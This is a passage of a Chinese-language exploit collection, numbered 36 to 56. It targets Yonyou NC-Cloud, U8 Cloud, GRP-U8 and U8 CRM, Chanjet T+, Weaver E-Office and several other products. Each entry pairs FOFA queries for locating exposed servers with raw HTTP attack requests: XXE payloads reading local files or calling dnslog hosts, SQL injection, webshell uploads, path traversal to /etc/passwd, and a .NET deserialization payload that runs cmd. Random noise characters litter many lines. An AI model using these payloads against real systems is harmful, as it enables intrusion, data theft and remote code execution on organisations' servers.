5 x0 n8 \+ A$ t" F- L5 J" s CPOST /nccloud/mob/pfxx/manualload/importhttpscer HTTP/1.1- q; H% m3 A! k8 T6 Y. X
Host: 203.25.218.166:8888
9 @0 F) ]3 t1 Q' }User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0 info
3 }% }$ k; s8 XAccept-Encoding: gzip, deflate
7 i6 p: {" g5 c& C, w; JAccept: */*7 @1 b8 [5 W& s2 k' [( R8 S- C) G* P
Connection: close/ Y& s9 }2 [! B2 o
accessToken: eyJhbGciOiJIUzUxMiJ9.eyJwa19ncm91cCI6IjAwMDE2QTEwMDAwMDAwMDAwSkI2IiwiZGF0YXNvdXJjZSI6IjEiLCJsYW5nQ29kZSI6InpoIiwidXNlclR5cGUiOiIxIiwidXNlcmlkIjoiMSIsInVzZXJDb2RlIjoiYWRtaW4ifQ.XBnY1J3bVuDMYIfPPJXb2QC0Pdv9oSvyyJ57AQnmj4jLMjxLDjGSIECv2ZjH9DW5T0JrDM6UHF932F5Je6AGxA
9 [* x+ |# R- ~1 [5 r3 y) H$ ~Content-Length: 190
& p0 v# S+ B, O6 jContent-Type: multipart/form-data; boundary=fd28cb44e829ed1c197ec3bc71748df0* v4 `9 P9 c/ f
4 w' ]$ W* n6 L- [) R2 I--fd28cb44e829ed1c197ec3bc71748df0* a" ]3 o, |! X7 {, c" Q# s1 a6 f
Content-Disposition: form-data; name="file"; filename="./webapps/nc_web/1.jsp"
- L0 K% O3 {" z1 [ ^, r6 W) I; K7 j- W( D9 S! w
<%out.println(1111*1111);%>0 y/ M% @" U1 g. p; H- b
--fd28cb44e829ed1c197ec3bc71748df0--$ q; E& ~- F% Z/ M. F
2 T+ B. u$ u+ V/ i! T' M, p8 k- C, T6 T7 _
36. 用友NC-Cloud soapFormat XXE
e6 t! z0 k4 a( b3 k) D6 X# jFOFA:body="/Client/Uclient/UClient.exe"||body="ufida.ico"||body="nccloud"||body="/api/uclient/public/"( k( v9 L& [" w5 L t- G
POST /uapws/soapFormat.ajax HTTP/1.1) U/ R0 {- N2 u
Host: 192.168.40.130:8989
# ^6 k& I% k2 VUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/109.0
8 l& W3 ^4 V4 V2 x6 |0 |Content-Length: 263+ Y" }# ^( ]1 [0 ^6 {
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
1 C2 T) G1 x( {* o) \! N) K4 G! ^' KAccept-Encoding: gzip, deflate* l3 l- l" |- {: V \
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
6 C! N! z c: ~( lConnection: close0 u5 G- K9 |, [
Content-Type: application/x-www-form-urlencoded
( v. x0 r% T. j4 ?. c9 ^Upgrade-Insecure-Requests: 1# W" ~3 o, ~. T6 f+ r. K% C3 z
! @' X# Z0 n/ e, }& S3 Y, Y* P4 V
msg=<!DOCTYPE foo[<!ENTITY xxe1two SYSTEM "file:///C://windows/win.ini"> ]><soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><soap:Fault><faultcode>soap:Server%26xxe1two%3b</faultcode></soap:Fault></soap:Body></soap:Envelope>%0a# Y# \2 A+ U( i1 q. o8 @
2 K y) N3 N: `$ f; ~* D; t6 E
. E. X* V, R" n- Y6 }
37. 用友NC-Cloud IUpdateService XXE! p: Y+ h, X( F7 J
FOFA:body="/Client/Uclient/UClient.exe"||body="ufida.ico"||body="nccloud"||body="/api/uclient/public/"9 f; V9 r. Q9 _. q2 V! y
POST /uapws/service/nc.uap.oba.update.IUpdateService HTTP/1.1
% h9 Z8 S/ `" t7 r0 g3 G+ v! wHost: 192.168.40.130:89890 L4 | c. Z" @* b
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
: |7 \/ r8 A/ n. N8 j6 [5 uContent-Length: 421
& L2 D: Q3 t. O) r; l) ^Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 i* {* u% M9 \0 l d
Accept-Encoding: gzip, deflate
7 `4 F- K( ]- c8 m- M6 [$ ^$ N! p) xAccept-Language: zh-CN,zh;q=0.97 c1 W! o1 G% l
Connection: close9 H( ^ d& K: p4 j4 J4 h3 ?
Content-Type: text/xml;charset=UTF-8
! J5 t- L$ a% h: x9 r! nSOAPAction: urn:getResult
( a* r2 _; ?) `" y& oUpgrade-Insecure-Requests: 1* W# u3 ?: I) _$ O/ m2 N# @
% P' B/ P4 p% m! ?( H<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:iup="http://update.oba.uap.nc/IUpdateService">0 X3 n1 K8 w' z" O6 X; _
<soapenv:Header/>
, f) R$ Q$ q# @" W: Z<soapenv:Body>
, J! d9 p9 q( t" ^<iup:getResult>9 k: `2 M: y0 E9 J
<!--type: string-->, `! p9 R" X# h5 `. \. t l/ V( ?
<iup:string><![CDATA[* A* L) E0 u" V
<!DOCTYPE xmlrootname [<!ENTITY % aaa SYSTEM "http://c2vkbwbs.dnslog.pw">%aaa;%ccc;%ddd;]>, R" p/ V$ _! i
<xxx/>]]></iup:string>% ?) z$ N+ [3 }2 a0 G
</iup:getResult>0 {; N% a2 ~: ]( s9 o( P+ }
</soapenv:Body>
" g1 J4 v9 [( d @. y</soapenv:Envelope>) C$ D; H) Y0 E! \
" c4 k) c0 g9 C: ?- l
6 H) h2 \4 B0 G' e/ {1 k' n
9 \% x( j4 ]* T' l. {" |2 ]38. 用友U8 Cloud smartweb2.RPC.d XXE# j G- `' x' m m6 j @& [5 d' h
FOFA:app="用友-U8-Cloud"2 F- V. ^/ ]+ X: }9 `7 v- @0 d* Y
POST /hrss/dorado/smartweb2.RPC.d?__rpc=true HTTP/1.1
- ^" E4 e& R5 Y0 _5 K* D% AHost: 192.168.40.131:8088
- \8 w( t( X& c7 N' q1 M XUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 12_10) AppleWebKit/600.1.25 (KHTML, like Gecko) Version/12.0 Safari/1200.1.25
. ^0 Q' F. Y7 h' XContent-Length: 260
7 o6 I8 W( P* [7 CAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3+ r! g$ L- c3 Z- r* O& [
Accept-Encoding: gzip, deflate
, o2 ^5 m8 {# ^4 a. y$ B/ cAccept-Language: zh-CN,zh;q=0.98 V/ d G8 `* @. D% Z y
Connection: close
6 G: w# j: S u. B, u9 OContent-Type: application/x-www-form-urlencoded
: _" N6 c% r2 [# Z/ {! N' A& I, K
! S; h: G) ^9 p+ y1 z__viewInstanceId=nc.bs.hrss.rm.ResetPassword~nc.bs.hrss.rm.ResetPasswordViewModel&__xml=<!DOCTYPE z [<!ENTITY Password SYSTEM "file:///C://windows//win.ini" >]><rpc transaction="10" method="resetPwd"><vps><p name="__profileKeys">%26Password;</p ></vps></rpc>
+ n( B2 f% H) N1 M
$ c: }7 O: p6 h# ?/ B& \' Q& ~1 s0 O, l' K' Y3 j9 c" C1 j2 H% o$ [, i& f
39. 用友U8 Cloud RegisterServlet SQL注入
7 u0 x K$ I% f% Q- l$ E1 AFOFA:title="u8c"! ]* W2 l' X% C! f: J
POST /servlet/RegisterServlet HTTP/1.1 k& |( u5 I$ y, o
Host: 192.168.86.128:8089
" m1 }. R d- E' T! n+ y6 MUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36
/ E1 s. c2 L, _1 v! DConnection: close
) y# Y+ |( P0 p( y- NContent-Length: 85' N; T/ ~. {0 Y" b$ O6 {5 _7 H4 d% y+ D
Accept: */*
9 g% B9 z3 T$ Z; o& ^) g6 CAccept-Language: en0 c! n& d+ X: U' N4 s0 I
Content-Type: application/x-www-form-urlencoded
' c' k! @) P( H- Z" WX-Forwarded-For: 127.0.0.1
- z' y( w+ c7 {$ RAccept-Encoding: gzip
' ^' `( _" _6 z: t( ~* v
2 r/ W2 r1 {) m" husercode=1' and substring(sys.fn_sqlvarbasetostr(HashBytes('MD5','123456')),3,32)>0--; ` M$ s. b Z- x
* V: O4 F" A& ~7 c6 d
2 q8 {; f9 Z3 d40. 用友U8-Cloud XChangeServlet XXE
X/ n+ c- S( T- p: nFOFA:app="用友-U8-Cloud"
4 ]5 i$ _! i+ [4 W9 m$ dPOST /service/XChangeServlet HTTP/1.1
, v+ |) l5 B9 h& Y; p8 _5 HHost: x.x.x.x
7 W6 N% a) u* O; j7 l! P' nUser-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
. N- @5 r f) j5 M9 eContent-Type: text/xml1 V. g( g& L- X5 Z1 x
Connection: close8 q' d4 U4 c5 M) T
: u; o0 d. k# d' E
<!DOCTYPE r [<!ELEMENT r ANY ><!ENTITY xxe SYSTEM "http://farr9frh.dnslog.pw">]><r><a>&xxe;</a ></r>6 G. T% l) a; u# C' @
$ N! o. y6 y5 N5 S& O/ i) e \* Q( y' }+ o' q7 i. w8 ~3 F
41. 用友U8 Cloud MeasureQueryByToolAction SQL注入
7 p! _3 h0 A3 j1 Z& s& _% a* EFOFA:app="用友-U8-Cloud"
2 j7 ?! |+ H8 |1 y& v& ~GET /service/~iufo/com.ufida.web.action.ActionServlet?action=nc.ui.iufo.query.measurequery.MeasureQueryByToolAction&method=execute&query_id=1%27);WAITFOR+DELAY+%270:0:5%27--+ HTTP/1.1# h/ T( _2 C4 C7 O2 r b
Host:
: Z7 u3 E/ Q0 M0 ?% EUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.151 ]; z: s* S( q! ^
Content-Type: application/json
8 U3 w# |8 m5 ~* W5 {) sAccept-Encoding: gzip% g" A8 m* P% n+ i: ^
Connection: close9 H- p t/ H, l$ `3 F( f( c
: v* W* B( C- {1 |, R) E- H2 ~* @* [8 E
42. 用友GRP-U8 SmartUpload01 文件上传( p. [- v/ |( h$ O7 h. ~0 T
FOFA:app="用友-GRP-U8"
& t$ }; M% {+ a3 Y1 ?9 ]( mPOST /u8qx/SmartUpload01.jsp HTTP/1.1
0 V% G1 z- q0 J, I: W% [. G" _1 GHost: x.x.x.x) {" {) p! n0 {: E: Q7 b7 i. w, t
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryzhvrkrqt
) \7 K% U( z% U% g! ~6 e: NUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36! O5 y# b1 ^& A3 @' i; m+ X" I
/ Q$ t: e, x1 s# w& ?4 }PAYLOAD+ p9 k" |# R+ o4 i g
" }% h8 n% C$ ]
/ y& ^! e- {* H0 k5 B
http://x.x.x.x/jatoolsreport?file=/1.pdf&as=dhtml5 l+ { E3 @: h [* E
0 a3 J" s$ g( H4 b* H43. 用友GRP-U8 userInfoWeb SQL注入致RCE
6 F5 C* c: B/ d3 K3 a$ AFOFA:app="用友-GRP-U8"
5 T1 I- V: F" d! |4 ~POST /services/userInfoWeb HTTP/1.1
2 V. z; }# a6 e a1 z: PHost: your-ip
0 h! w6 S) L% m r: iUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36(KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
$ J! z) a+ t6 l! l6 H: dAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7( ?1 p" k' e* A8 b' v [) \ y
Accept-Encoding: gzip, deflate
/ Y) u1 _/ T8 f# wAccept-Language: zh-CN,zh;q=0.9' C a, ?+ t: S5 J7 y
Connection: close
, U" F# f4 K" r6 bSOAPAction:
% Q% i$ T; }$ q7 nContent-Type: text/xml;charset=UTF-8
. a9 U. Z# c# o! m- V
7 U5 j1 z; A1 o<soapenv:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:ser="http://service.pt.midas.ufgov.com">
7 M( P L: k z$ n8 V( S% K <soapenv:Header/>
& t5 a' J1 {8 i+ k* J, a1 b7 s <soapenv:Body>/ n( Z8 B2 r2 X7 v `3 T( a
<ser:getUserNameById soapenv:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">2 ~3 q d ~7 A; e. E3 ]6 F8 X. h
<userId xsi:type="soapenc:string" xmlns:soapenc="http://schemas.xmlsoap.org/soap/encoding/">';waitfor delay '0:0:5'--</userId>7 ^6 B6 p) t& o) t* l
</ser:getUserNameById>
/ J' z! I. S9 B2 h* I4 H- q </soapenv:Body>7 a1 ^+ Y. ^$ j* m( X; I
</soapenv:Envelope>
" h/ F. z% R1 ?0 Z* f7 v* d
" X! {. _9 |% a4 z# h+ ~7 f6 }
: m% g" v, k% V7 u ^8 u44. 用友GRP-U8 bx_dj_check.jsp SQL注入! Z4 [3 `/ Y. r' m3 @
FOFA:app="用友-GRP-U8"
4 c5 I9 J0 n$ {9 WGET /u8qx/bx_dj_check.jsp?djlxdm=OER&djid=1';waitfor+delay+'0:0:5'-- HTTP/1.1 W' L$ s% ]1 m2 u0 @# _
Host: your-ip0 i( ^% F- s6 ?; k
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36% j+ ]0 K. p) H( d0 n
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
/ f+ O5 a8 z- t% M+ ]6 D. DAccept-Encoding: gzip, deflate
6 Z+ E5 Y* M a3 pAccept-Language: zh-CN,zh;q=0.9
0 D& Q& N& e9 s/ `" a4 u' G% x* DConnection: close/ \( R. J0 e% z v
4 X4 P3 S% b' Y& T% U
$ G9 Y1 P% x$ w0 P/ n$ I, U$ l3 s45. 用友GRP-U8 ufgovbank XXE- q# g( i2 U3 t% P, C& r2 U
FOFA:app="用友-GRP-U8"/ ?7 e6 w/ Y0 r
POST /ufgovbank HTTP/1.1! [/ H4 }' |/ s% W5 ~* M7 x8 N# a
Host: 192.168.40.130:222# c: z% N5 ^' s: \3 T; A' m6 I
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:104.0) Gecko/20100101 Firefox/104.01 ~2 O* z" d7 V& y' `. w% @9 _
Connection: close" E9 `- }0 o6 ]0 u- i
Content-Length: 161
/ x% M7 ~2 ^) j. {* G3 n. wAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
/ i# |& c, ?) U- e) BAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2, V( c$ D1 r' W l/ R
Content-Type: application/x-www-form-urlencoded# x1 _! a3 u# p" Y: Z/ Y
Accept-Encoding: gzip
8 N' Z" n! u% P( n B! O
9 j2 z. X, l( }reqData=<?xml version="1.0"?>
! [9 o: B( E! { O k<!DOCTYPE foo SYSTEM "http://c2vkbwbs.dnslog.pw">&signData=1&userIP=1&srcFlag=1&QYJM=0&QYNC=adaptertest3 |9 M/ R0 f A& r4 s: r5 _
: m9 [5 Q) H2 {% t J; o: k1 r0 h* A- d
46. 用友GRP-U8 sqcxIndex.jsp SQL注入" J0 o1 y* _' R" @8 c! \8 d
FOFA:app="用友-GRP-U8"8 [2 }6 ?8 \2 Q G; ~6 p
GET /u8qx/sqcxIndex.jsp?key=1');+waitfor+delay+'0:0:5'-- HTTP/1.12 i6 s0 M# W- `: w4 r) _: V
Host: your-ip
" q7 c U5 S" ^+ X3 kUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36' p" d6 m! b& G" n# B
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
: D. j# x" X3 p/ k4 ?/ l% IAccept-Encoding: gzip, deflate
6 t4 N6 e, T) c' B, t! KAccept-Language: zh-CN,zh;q=0.90 e8 i; c+ R% f. r1 [
Connection: close+ P8 {. C9 {) t: t% n( c, a% X
# W2 C; S2 s/ c6 ?8 u( S: F0 Q: b- y& N% C" b* N
47. 用友GRP A++Cloud 政府财务云 任意文件读取
" i3 D; _ b* D5 t, |4 K GFOFA:body="/pf/portal/login/css/fonts/style.css"9 H- P; `& @, B! |+ m7 e
GET /ma/emp/maEmp/download?fileName=../../../etc/passwdHTTP/1.12 Y Q6 `" W# l, F; p; o4 I
Host: x.x.x.x
3 z$ ?8 Q/ R; G: b* sCache-Control: max-age=0
: d! }' h# Z2 d% O2 D8 {; oUpgrade-Insecure-Requests: 1
- `4 m+ v. o) M( C3 F# xUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
' w" A% \" F- t, c' o5 pAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
. c4 s) t3 C, u7 k9 e# Q$ mAccept-Encoding: gzip, deflate, br
* K5 ~. x# q7 l+ OAccept-Language: zh-CN,zh;q=0.9
$ F) i# H4 x5 A/ J, H8 EIf-Modified-Since: Wed, 11 Oct 2023 05:16:05 GMT
0 z" k2 i2 l& L: FConnection: close
( V# D; c1 e. b6 ?. a* S l
( F& f2 y& v, C9 }$ v' v
& f4 x" [( N* D( w& n+ D7 ?7 t7 l9 d6 I6 u0 |
48. 用友U8 CRM swfupload 任意文件上传
, [* O% d: ?: b: S/ UFOFA:title="用友U8CRM"
l& r; Q$ \1 ]1 v6 v9 h0 iPOST /ajax/swfupload.php?DontCheckLogin=1&vname=file HTTP/1.10 _8 I2 B: q. x8 K; q% d" E5 D! M
Host: your-ip
) F# i I! \8 U8 MUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
: Z, J0 C* V8 p9 cAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8) y; G- W% }$ D( a( H9 q
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
8 M! E/ m, l3 OAccept-Encoding: gzip, deflate
@1 A8 J; s, IContent-Type: multipart/form-data;boundary=----269520967239406871642430066855' S3 E2 n* r$ X8 i q5 a
------269520967239406871642430066855
2 o k6 }2 U! {+ L. _Content-Disposition: form-data; name="file"; filename="s.php": T# h8 ]" |) [8 ?) T% Q
1231
) N& \: ] z. ?* y7 B' U- kContent-Type: application/octet-stream
7 p) Z, Y# C& R0 V------269520967239406871642430066855- h. P; u+ Q5 D* g
Content-Disposition: form-data; name="upload"
5 U) A& I; K6 H Y1 ]( x$ I/ Fupload7 q C4 _; u: Y6 t# X$ C! i
------269520967239406871642430066855--
# H r; N) B+ }/ Z: Z7 `+ Y- J8 z- a9 m0 W& T" A9 w1 j
I- U1 ?& j% f49. 用友U8 CRM系统uploadfile.php接口任意文件上传/ l6 G9 W* c% z5 ~/ }! ?7 Y- ~% i
FOFA:body="用友U8CRM"
% c! b" u3 m, S6 C2 m5 T j- M( u1 C6 j2 ^$ e
POST /ajax/uploadfile.php?DontCheckLogin=1&vname=file HTTP/1.1
6 j' |& n/ G( J9 {Host: x.x.x.x! _2 a7 R4 U- s# s
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0/ F4 ^, _+ R7 y F7 N
Content-Length: 329
$ q& s9 g- n; Y: \ VAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8/ b, ?# ?$ I; B& r
Accept-Encoding: gzip, deflate
) |' P+ i3 w: d1 jAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2/ @ ?8 [; y8 g
Connection: close4 k# o8 H, x5 ]2 K8 x
Content-Type: multipart/form-data; boundary=---------------------------vvv3wdayqv3yppdxvn3w
# |; c5 P( N4 X& r8 Y0 d( x
& c( A( j p* m) ^% }4 i+ R" u-----------------------------vvv3wdayqv3yppdxvn3w
; R, P+ N1 }+ i& `% r, h2 S, w; vContent-Disposition: form-data; name="file"; filename="%s.php "
" T- j5 q! Q* |+ k+ r) R4 oContent-Type: application/octet-stream5 v# s+ i# [8 o6 m+ F7 K7 L
. V' r/ ^ v2 Q7 l* R) J* Q) |wersqqmlumloqa! D. M, b! S( x! a( m& p; |1 W# @
-----------------------------vvv3wdayqv3yppdxvn3w2 M' Y/ G" H3 B! |' h, j
Content-Disposition: form-data; name="upload"
' Y/ @% E( n' h7 D8 w3 ?7 l, U8 e3 x+ E9 z! s: Y0 r; e
upload) n; k6 w+ s& b7 \! g
-----------------------------vvv3wdayqv3yppdxvn3w--
- ]: R+ X, o6 ~3 ]& N" \- [$ Y# e' ~7 x! H% `
& }& O$ ]4 ~8 c# e7 H3 [http://x.x.x.x/tmpfile/updB3CB.tmp.php
& Z% Y* p7 ^/ V0 v( K+ J( L% w; \ B3 P
50. QDocs Smart School 6.4.1 filterRecords SQL注入& }# d; }. S" z! T' E
FOFA:body="close closebtnmodal" o; Z9 v6 c! c1 f d/ R6 V8 y) O# m
POST /course/filterRecords/ HTTP/1.1 h4 V( y3 a* p% t' }
Host: x.x.x.x# P; V8 |2 |1 B3 ^* T+ M
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36+ X* S- V; d/ K" H1 i
Connection: close* f2 O" F1 N5 A: ^. ?. o4 ^
Content-Length: 224
6 u8 c0 w% k9 p. g% |Accept: */*
9 m. Y# q+ g1 q/ i8 @- g6 m2 ?Accept-Language: en: T- T) ~3 {- w( F' P
Content-Type: application/x-www-form-urlencoded& i8 |# A3 d; X0 c! Y
Accept-Encoding: gzip
R7 R# u: c+ d8 U- p7 X$ G& y# s( A
2 {0 I* \; A6 h j9 Ssearchdata[0][title]=&searchdata[0][searchfield]=1&searchdata[0][searchvalue]=1&searchdata[1][title]=1&searchdata[1][searchfield]=1=1 and extractvalue(1,concat(0x5e,(select md5(123456)),0x5e))%23&searchdata[1][searchvalue]=1
8 S" q1 Y1 p1 _3 M1 m) s# \" R, E0 V' Q$ G4 m" l
, [& i! O' N$ |, i: h" R51. 云时空社会化商业 ERP 系统 validateLoginName SQL 注入
& r1 A' i% \ R1 }FOFA:app="云时空社会化商业ERP系统"
) c! ?) Y, [+ V9 f2 eGET /sys/user/validateLoginName?loginName=admin'+AND+4563=DBMS_PIPE.RECEIVE_MESSAGE(CHR(65),5)-- HTTP/1.11 Z; W" Z4 M# L6 C0 q! k- v7 D3 `
Host: your-ip+ r& @* ^$ Q" @( \7 r) v" W6 g
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36
- c/ x( d2 [! h% aAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9+ ?& c1 u" v$ ^
Accept-Encoding: gzip, deflate8 B8 S3 r5 z" ]7 _7 S9 K0 l) }
Accept-Language: zh-CN,zh;q=0.9
/ Q- j( }) P8 W4 D4 G) m" D* TConnection: close
4 Y2 l) M$ Y5 P% v4 S
5 N% Z" l# Z4 H# p# g3 K* `# l. Q* R$ A; z0 p8 l/ O1 K
52. 泛微E-Office json_common.php sql注入1 S2 w; i( M+ R d
FOFA:app="泛微-EOffice"
$ B9 G/ q8 O% u7 j; @POST /building/json_common.php HTTP/1.1/ k' K; @& [1 `) O
Host: 192.168.86.128:80970 X$ ~ Q) A. e5 r7 l& {, J
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36% V7 ]3 I$ q$ o% T2 M$ f' A
Connection: close
) U0 T0 p3 q8 J5 h$ eContent-Length: 87
2 G$ n3 x+ t! W/ w, zAccept: */*3 y V8 G) q7 b% w1 X. n
Accept-Language: en
- l6 [5 `0 o x. [1 F) `! R# r2 oContent-Type: application/x-www-form-urlencoded2 J+ C3 s9 U c
Accept-Encoding: gzip
, I. z& x7 I: q6 E
! r! K" l0 \" p6 _6 x, Jtfs=city` where cityId =-1 /*!50000union*/ /*!50000select*/1,2,md5(102103122) ,4#|2|3336 L# L7 [6 `2 m8 i: {: X
+ m9 `( h( N, }& R8 H% F) U" p
/ D7 c0 l, p) w* l& o) k7 ^7 n
53. 迪普 DPTech VPN Service 任意文件上传
0 C: H9 ~2 R! F3 K4 k1 P- HFOFA:app="DPtech-SSLVPN"; O- X7 T8 N' a
/..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd
5 x' B& g9 W; P+ {% q
( m1 J/ D- f1 E; p3 ~: B1 J5 ?
% P- x- k. M5 Z* b4 O54. 畅捷通T+ getstorewarehousebystore 远程代码执行( K j3 g* c: T. v7 q7 ?5 v6 y8 \
FOFA:app="畅捷通-TPlus"
& N4 G, j6 n. h) F6 B$ N z1 r2 _, ]第一步,向目标发送数据包,执行命令,将指定字符串写入指定文件. \9 P0 L) ]* c% z( K7 T, P
"/c echo 2WcBDoxC7JXhegsmOp6vJJ2dZBl > .2WcBDoxC7JXhegsmOp6vJJ2dZBl.txt"/ R5 M2 Q8 r6 K) {8 q5 a" Q4 n3 J
$ z; M/ H# g9 T" e$ \* `
( H2 s- s3 ~ Q3 w: N0 I( b完整数据包
1 H" [% ~ b/ c! q8 q8 Y6 @* L- Q, APOST /tplus/ajaxpro/Ufida.T.CodeBehind._PriorityLevel,App_Code.ashx?method=GetStoreWarehouseByStore HTTP/1.19 y) |% e% W1 x! H; k* w
Host: x.x.x.x/ x% U- H l2 d- z* {
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F. I$ @4 r; t! @4 V$ n' l
Content-Length: 5935 t% V, X2 W. w# C" L7 `
$ C8 ?+ L1 g- v
{
4 y/ n% v- x# q& @"storeID":{
) m9 V: }0 J2 c8 l5 T# C "__type":"System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35",% d& l- O# F6 y& U1 k
"MethodName":"Start",
# R5 [% ~- O2 X/ @9 E. K7 L% m/ j "ObjectInstance":{
& a0 B! P0 l* H% D "__type":"System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
) W+ S/ U" N( m Z: u) t7 a1 U "StartInfo":{0 ^6 f1 H/ l9 r
"__type":"System.Diagnostics.ProcessStartInfo, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",; H( B' T9 P6 o8 K4 B) O
"FileName":"cmd",
. i# `1 i# @1 ^; S "Arguments":"/c echo 2WcBDoxC7JXhegsmOp6vJJ2dZBl > .2WcBDoxC7JXhegsmOp6vJJ2dZBl.txt"
. V/ @ c4 z$ ?! \/ a }9 P5 X, f' Y. y9 u$ ~
}
6 L" e* ?& C% m3 S$ J }
# W, l E2 i. e}
) {( o1 `6 o2 L# T+ u1 Q5 [7 T% G0 ^3 P4 B) v- K
3 t* U# |" k- d h$ D0 v第二步,访问如下url
( o# C! ~4 S" J5 C0 {! t; ^4 B/tplus/.2WcBDoxC7JXhegsmOp6vJJ2dZBl.txt/ W: k4 ^! a8 o0 m: Q, Y' l4 a* y
o: x% J9 z3 A) t1 l
. ]7 u1 \* N) U2 c( @8 E% s
55. 畅捷通T+ getdecallusers信息泄露
2 r; y8 F. h, h) rFOFA:app="畅捷通-TPlus"& e6 W) ?& [5 T, {( E1 n$ e7 U/ X
第一步,通过+ }& e5 ^8 t' v- ^
/tplus/ajaxpro/Ufida.T.SM.Login.UIP.LoginManager,Ufida.T.SM.Login.UIP.ashx?method=CheckPassword接口获取Cookie
, d. P9 z! u; X v% p3 \第二步,利用获取到的Cookie请求8 M8 f8 {% X% D z
/tplus/sm/privilege/ajaxpro/Ufida.T.SM.UIP.Privilege.PreviligeControl,Ufida.T.SM.UIP.ashx?method=GetDecAllUsers
8 @; ]8 ?$ s; U( a- a# q7 U
! w0 i) j$ F3 ~1 n, t% W" @( w4 ?6 ~56. 畅捷通T+ RRATableController,Ufida.T.DI.UIP.ashx 反序列化RCE1 J% i2 J/ S' B( f; T8 g7 L
FOFA: app="畅捷通-TPlus"
1 a% d! U1 S9 X9 z8 zPOST /tplus/ajaxpro/Ufida.T.DI.UIP.RRA.RRATableController,Ufida.T.DI.UIP.ashx?method=GetStoreWarehouseByStore HTTP/1.14 Q$ A9 b' f! I8 o, X, q
Host: x.x.x.x
